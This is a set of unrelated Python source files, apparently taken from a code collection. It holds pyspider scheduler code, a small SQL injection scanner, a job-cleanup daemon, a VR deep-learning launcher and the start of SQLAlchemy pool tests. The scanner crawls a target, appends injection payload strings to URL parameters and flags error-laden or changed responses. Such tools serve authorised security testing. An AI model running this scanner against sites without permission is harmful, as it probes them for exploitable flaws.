top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
'''consume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
def on_request(self, task):
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
# when a task is being processed, the modification may conflict with the
# running task. Postpone the modification until the task finishes.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
# inject information about the project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler mixin class for "one" mode.
Overrides the send_task method to
call processor.on_task(fetcher.fetch(task)) instead of consuming a queue.
"""
def _check_select(self):
"""
interactive mode for selecting tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl the given url; takes the same parameters as BaseHandler.crawl.
url - a url or taskid; stored parameters are used if it exists in taskdb.
project - can be omitted if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
raise LookupError('You need to specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
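# Illustrative consequence of the patch above: in interactive mode an
# attribute lookup such as `self.index_page` returns the string
# "index_page", so crawl(url, callback=self.index_page) records the
# callback by name rather than as a bound method.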
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def init_one(self, ioloop, fetcher, processor,
result_worker=None, interactive=False):
self.ioloop = ioloop
self.fetcher = fetcher
self.processor = processor
self.result_worker = result_worker
self.interactive = interactive
self.running_task = 0
@gen.coroutine
def do_task(self, task):
self.running_task += 1
result = yield gen.Task(self.fetcher.fetch, task)
_type, task, response = result.args
self.processor.on_task(task, response)
# handle queued messages
while not self.processor.inqueue.empty():
_task, _response = self.processor.inqueue.get()
self.processor.on_task(_task, _response)
# handle queued results
while not self.processor.result_queue.empty():
_task, _result = self.processor.result_queue.get()
if self.result_worker:
self.result_worker.on_result(_task, _result)
self.running_task -= 1
def send_task(self, task, force=True):
if self.fetcher.http_client.free_size() <= 0:
if force:
self._send_buffer.appendleft(task)
else:
raise self.outqueue.Full
self.ioloop.add_future(self.do_task(task), lambda x: x.result())
def run(self):
import tornado.ioloop
tornado.ioloop.PeriodicCallback(self.run_once, 100,
io_loop=self.ioloop).start()
self.ioloop.start()
def quit(self):
self.ioloop.stop()
logger.info("scheduler exiting...")
import random
import threading
from pyspider.database.sqlite.sqlitebase import SQLiteMixin
class ThreadBaseScheduler(Scheduler):
def __init__(self, threads=4, *args, **kwargs):
self.local = threading.local()
super(ThreadBaseScheduler, self).__init__(*args, **kwargs)
if isinstance(self.taskdb, SQLiteMixin):
self.threads = 1
else:
self.threads = threads
self._taskdb = self.taskdb
self._projectdb = self.projectdb
self._resultdb = self.resultdb
self.thread_objs = []
self.thread_queues = []
self._start_threads()
assert len(self.thread_queues) > 0
@property
def taskdb(self):
if not hasattr(self.local, 'taskdb'):
self.taskdb = self._taskdb.copy()
return self.local.taskdb
@taskdb.setter
def taskdb(self, taskdb):
self.local.taskdb = taskdb
@property
def projectdb(self):
if not hasattr(self.local, 'projectdb'):
self.projectdb = self._projectdb.copy()
return self.local.projectdb
@projectdb.setter
def projectdb(self, projectdb):
self.local.projectdb = projectdb
@property
def resultdb(self):
if not hasattr(self.local, 'resultdb'):
self.resultdb = self._resultdb.copy()
return self.local.resultdb
@resultdb.setter
def resultdb(self, resultdb):
self.local.resultdb = resultdb
def _start_threads(self):
for i in range(self.threads):
queue = Queue.Queue()
thread = threading.Thread(target=self._thread_worker, args=(queue, ))
thread.daemon = True
thread.start()
self.thread_objs.append(thread)
self.thread_queues.append(queue)
def _thread_worker(self, queue):
while True:
method, args, kwargs = queue.get()
try:
method(*args, **kwargs)
except Exception as e:
logger.exception(e)
def _run_in_thread(self, method, *args, **kwargs):
i = kwargs.pop('_i', None)
block = kwargs.pop('_block', False)
if i is None:
while True:
for queue in self.thread_queues:
if queue.empty():
break
else:
if block:
time.sleep(0.1)
continue
else:
queue = self.thread_queues[random.randint(0, len(self.thread_queues)-1)]
break
else:
queue = self.thread_queues[i % len(self.thread_queues)]
queue.put((method, args, kwargs))
if block:
self._wait_thread()
def _wait_thread(self):
while True:
if all(queue.empty() for queue in self.thread_queues):
break
time.sleep(0.1)
def _update_project(self, project):
self._run_in_thread(Scheduler._update_project, self, project)
def on_task_status(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_task_status, self, task, _i=i)
def on_request(self, task):
i = hash(task['taskid'])
self._run_in_thread(Scheduler.on_request, self, task, _i=i)
def _load_put_task(self, project, taskid):
i = hash(taskid)
self._run_in_thread(Scheduler._load_put_task, self, project, taskid, _i=i)
def run_once(self):
super(ThreadBaseScheduler, self).run_once()
self._wait_thread()
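# Minimal standalone sketch (illustrative, not part of pyspider) of the
# thread-local lazy-copy pattern used by the taskdb/projectdb/resultdb
# properties above: each thread that touches `.db` lazily gets its own
# copy of the shared handle, so drivers that are not thread-safe are only
# ever used from the thread that created them.
class _ThreadLocalDBSketch(object):
    def __init__(self, shared_db):
        self._shared = shared_db          # template handle; assumed to offer copy()
        self._local = threading.local()   # per-thread storage
    @property
    def db(self):
        if not hasattr(self._local, 'db'):
            self._local.db = self._shared.copy()
        return self._local.db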
|
SQLInjectionScanner.py | import requests
import re
import difflib
import threading
import queue
import lib.spider.Spider
import time
def info():
info = {
'name': 'sql',
'path': 'SQLInjectionScanner',
'fullname': 'SWEP SQL INJECTION SCANNER',
'description': 'A simple SQL Injection scanner.',
'parameters': {
'Url': 'Target URL.',
'Threads': 'Threads. Default: 10',
'Protocol': 'Protocol. Default: http',
'Timeout': 'Request timeout. Default: 3'
},
'author': 'BERACHER security',
'date': '2019-01-12'
}
return info
class Scanner():
def __init__(self):
self.Url = None
self.Threads = 10
self.Timeout = 3
self._Counter = 0
self._Ratio = 0.9
self.Protocol = 'http'
self.KeywordList = ['w', '\') ', '")', '%23', '--w']
self.Spider = lib.spider.Spider.Spider()
self.differ = difflib.SequenceMatcher()
self.Queue = queue.Queue()
self.Status = True
self.TaskList = []
self.PageList = []
self.UrlList = []
def GetSitePages(self, *PageList):
self.Spider.Url = self.Url
self.Spider.Threads = self.Threads
self.Spider.Protocol = self.Protocol
if PageList:
PageList = PageList[0]
else:
PageList = self.Spider.SpiderSite()
ParmDict = {} # Dict: {url:{arg: val}}
for url in PageList:
try:
url, args = url.split('?')
if args:
parms = args.split('&')
else:
continue
if url not in ParmDict.keys():
ParmDict[url] = {}
for Parm in parms:
arg, val = Parm.split('=')
if arg not in ParmDict[url].keys():
ParmDict[url][arg] = val
print(ParmDict[url])
except Exception as e:
print('[!] Error: Failed to parse params: %s' % str(e))
return ParmDict
def CheckSQLInjection(self):
if not self.PageList:
ParmDict = self.GetSitePages()
else:
ParmDict = self.GetSitePages(self.PageList)
self.Threads = int(self.Threads)
self.Timeout = int(self.Timeout)
for url in ParmDict.keys():
try:
if not self.Url:
print('[!] Error: URL not specified.')
RawUrl = '%s://%s/%s?' % (self.Protocol, self.Url, url)
PayloadList = self.GenPayload(RawUrl, ParmDict[url])  # {url: {parm: keyword}}
self.Queue.put(PayloadList)
except Exception as e:
print('[!] Error generating payload: %s' % str(e))
taskchecker = threading.Thread(target=self.ThreadChecker)
taskchecker.daemon = True
self.Status = True
taskchecker.start()
try:
while self.Queue.qsize():
if self.Threads > len(self.TaskList):
thread = threading.Thread(target=self.CheckVulnerability, args=[self.Queue.get()])
thread.start()
self.TaskList.append(thread)
if not self.Queue.qsize():
print('[*] Scan completed, synchronizing threads.')
for item in self.TaskList:
item.join()
break
except KeyboardInterrupt:
print('[*] Keyboard interrupt, quitting.')
except Exception as e:
print('[!] Error checking SQL injection: %s' % str(e))
self.Status = False
return self.UrlList
def GenPayload(self, url, Payloads): # Gen payload: first parm, second parm, both parm
RawUrl = url
PayloadList = []
for parm in Payloads.keys():
value = Payloads[parm]
url += '%s=%s&' %(parm, value)
url = url.rstrip('&')
for Keyword in self.KeywordList:
Payload = RawUrl
for parm in Payloads.keys():
value = Payloads[parm]
Payload += '%s=%s%s&' %(parm, value, Keyword)
Payload = Payload.rstrip('&')
PayloadList.append(Payload)
PayloadDict = {url:PayloadList}
return PayloadDict
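# Illustrative shape of the mapping returned above: for RawUrl
# 'http://host/item.php?' with params {'id': '1'} and keyword '%23', one
# entry is {'http://host/item.php?id=1': ['http://host/item.php?id=1%23', ...]},
# i.e. the clean URL maps to one payload URL per keyword in KeywordList.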
def CheckVulnerability(self, UrlDict):  # Check the page for keywords; if none match, fall back to the diff ratio.
for raw in UrlDict.keys():
try:
RawResp = requests.get(raw, timeout=self.Timeout).text
except Exception as e:
print('[!] Failed to fetch raw page: %s' % str(e))
continue
try:
for payload in UrlDict[raw]:
resp = requests.get(payload, timeout=self.Timeout)
self.differ.set_seqs(RawResp, resp.text)
if resp.status_code == 500:
print('[*] %s seems vulnerable to SQL injection: status code.' % str(payload))
elif re.findall('Error|SQL Error|sql|database|Syntax|Error \d{4} .*|\(\d{6}\)|failed|You have an error in your SQL syntax', resp.text, re.I):
print('[*] %s seems vulnerable to SQL injection: keyword.' % str(payload))
elif self.differ.ratio() < self._Ratio:
print('[*] %s seems vulnerable to SQL injection: ratio.' % str(payload))
else:
pass
self.UrlList.append(payload)
except Exception as e:
print('[!] Error checking vulnerability: %s' % str(e))
pass
return self.UrlList
def Scan(self):
if not self.Url:
print('[!] URL not specified.')
return
if not self.Timeout:
print('[*] Timeout not specified, using 3 by default.')
self.Timeout = 3
else:
self.Timeout = int(self.Timeout)
UrlList = self.CheckSQLInjection()
return UrlList
def ThreadChecker(self):
time.sleep(1)
while self.Status:
for item in self.TaskList:
if not item.is_alive():
self.TaskList.remove(item)
del item
return
def info(self):
InformationList = info()
args = InformationList['parameters']
print('[*] Incoming scanner information:')
print('[*] Scanner name: %s' % InformationList['name'])
print(' | %s' % InformationList['fullname'])
print(' | Description: %s' % InformationList['description'])
print(' | Author: %s' % InformationList['author'])
print(' | Date: %s' % InformationList['date'])
print(' | Arguments: Total %i' % len(args))
print(' | | NAME DESCRIPTION')
print(' | | ---- -----------')
for item in args.keys():
print(' | | %s%s' % (item.ljust(12), args[item]))
print(' |')
print('[*] Scanner information end.')
def test():
scanner = Scanner()
scanner.Url = ''
scanner.Scan()
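# Usage sketch (hypothetical host; Spider and queue wiring as defined above):
#   scanner = Scanner()
#   scanner.Url = 'testphp.example.com'   # host only; the scheme comes from Protocol
#   scanner.Threads = 5
#   found = scanner.Scan()
#   print('[*] Candidate URLs: %d' % len(found or []))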
|
job_cleaner_daemon.py | import time
import threading
from broker.utils.accumulated_sum_linked_list import AccumulatedSumLinkedList
class JobCleanerDaemon():
def __init__(self, submissions):
self.submissions = submissions
self.queue = AccumulatedSumLinkedList()
self.thread = None
self.active = False
def start_delete_resources_management(self):
while not self.queue.is_empty():
time.sleep(1)
self.queue.head.value.remaining_time -= 1
if self.queue.head.value.remaining_time <= 0:
jobs_finished_ids = self.queue.pop().value.get_app_ids()
for job_id in jobs_finished_ids:
job = self.submissions[job_id]
job.delete_job_resources()
self.active = False
def insert_element(self, app_id, remaining_time):
element = JobRepr(app_id, remaining_time)
self.queue.insert(element)
if not self.active:
self.active = True
self.start_thread()
def start_thread(self):
self.thread = \
threading.Thread(target=self.start_delete_resources_management)
self.thread.daemon = True
self.thread.start()
class JobRepr():
def __init__(self, app_id, remaining_time):
self.remaining_time = remaining_time
self.app_ids = [app_id]
def get_app_ids(self):
return self.app_ids
def get_remaining_time(self):
return self.remaining_time
def set_remaining_time(self, new_remaining_time):
self.remaining_time = new_remaining_time
def __repr__(self):
return str(self.app_ids) + ": " + str(self.remaining_time) + " sec"
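# Usage sketch (illustrative; assumes AccumulatedSumLinkedList keeps nodes
# ordered by accumulated remaining_time, as the names above suggest):
#   daemon = JobCleanerDaemon(submissions)   # submissions: {app_id: job}
#   daemon.insert_element('job-42', 60)      # hypothetical id; cleaned up ~60s later
# The daemon thread ticks once per second, decrements the head node, and pops
# it once it reaches zero, calling delete_job_resources() on each finished job.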
|
local_vrdl.py | """
Copyright © 2020, University of Texas Southwestern Medical Center. All rights reserved.
Contributors: Kevin VanHorn, Meyer Zinn, Murat Can Cobanoglu
Department: Lyda Hill Department of Bioinformatics.
This software and any related documentation constitutes published and/or unpublished works and may contain valuable trade secrets and proprietary information belonging to The University of Texas Southwestern Medical Center (UT SOUTHWESTERN). None of the foregoing material may be copied, duplicated or disclosed without the express written permission of UT SOUTHWESTERN. IN NO EVENT SHALL UT SOUTHWESTERN BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF UT SOUTHWESTERN HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. UT SOUTHWESTERN SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE AND ACCOMPANYING DOCUMENTATION, IF ANY, PROVIDED HEREUNDER IS PROVIDED "AS IS". UT SOUTHWESTERN HAS NO OBLIGATION TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
This software contains copyrighted materials from Oculus, Unity Technologies, Keras, TensorFlow, gRPC, NumPy, Matplotlib, OpenCV, Pyprind, Nvidia CUDA, wiki.unity3d.com, PyCharm, Visual Studio Community, and Google. Corresponding terms and conditions apply.
"""
"""
vrdl.py (Virtual Reality Deep Learning)
Hub program that spawns and handles communication between a server and evaluator.
"""
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ['CUDA_VISIBLE_DEVICES'] = "0"  # set to "-1" to hide all GPUs (CPU-only)
from evaluator import main as evaluator_main
from evaluator import GPUSpawnerPersistent as spawner
from data_manager import DataManager
from local_server import Server
from multiprocessing import Process
NUM_FOLDS = 10 # Number of times to test the model for k-fold stratification.
NUM_GPUS = 3 # Spawns k persistent threads (1 per GPU).
if __name__ == '__main__':
# Spawn a server and evaluator, connectors are in order ("in", "out") internally
dm = DataManager(NUM_FOLDS)
evaluator = evaluator_main(NUM_GPUS, NUM_FOLDS, dm)
server = Process(target=Server, args=(dm, evaluator))
server.start()
try:
server.join()
except KeyboardInterrupt:
print("\t vrdl on exit.")
evaluator.on_exit()
|
test_pool.py | import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.pool.base import _AsyncConnDialect
from sqlalchemy.pool.base import _ConnDialect
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_not_none
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
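# Illustrative behaviour of the mock above (not one of the suite's tests):
#   db = MockDBAPI()
#   conn = db.connect()   # a Mock whose close() flips conn.closed to True
#   db.shutdown(True)     # db.connect() now raises Exception("connect failed")
#   db.shutdown(False)    # db.connect() hands out working mock connections again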
class PoolTestBase(fixtures.TestBase):
def setup_test(self):
pool.clear_managers()
self._teardown_conns = []
def teardown_test(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_test_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
_is_asyncio = kw.pop("_is_asyncio", False)
p = pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw)
if _is_asyncio:
p._is_asyncio = True
p._dialect = _AsyncConnDialect()
return dbapi, p
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select(1).compile(testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
